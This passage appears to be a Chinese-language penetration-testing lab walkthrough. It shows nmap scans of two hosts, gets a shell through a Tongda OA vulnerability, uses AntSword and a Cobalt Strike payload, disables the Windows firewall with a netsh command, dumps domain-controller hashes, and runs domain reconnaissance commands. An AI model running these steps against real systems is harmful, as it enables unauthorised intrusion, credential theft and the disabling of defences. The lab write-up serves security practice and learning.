$ sudo nmap -sT -sV -O 192.168.0.204 Starting Nmap 7.93 ( https://nmap.org ) Nmap scan report for www.moonlab.com (192.168.0.204) Host is up (0.0018s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 10.0 999/tcp open http Microsoft IIS httpd 10.0 MAC Address: 00:0C:29:36:38:42 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012 (98%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 Aggressive OS guesses: Microsoft Windows Server 2016 (98%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.89 seconds
Host is up (1.2s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http nginx | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3 | http-robots.txt: 1 disallowed entry |_/ 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 4775.10 seconds
漏洞测试
80端口为通达OA,利用通达OA漏洞检测工具拿到shell。
蚁剑直接连接:
cs生成正向马,执行后connect 没反应,查看进程,正向马正常运行。存在防火墙,将防火墙关闭。
1
NetSh Advfirewall set allprofiles state off
关闭后成功上上线:
明文抓取,拿到了域控啥的Hash。
域控
信息收集
定位域控信息:
1 2 3
shell net user /domain shell net time /domain shell ping dc.attack.local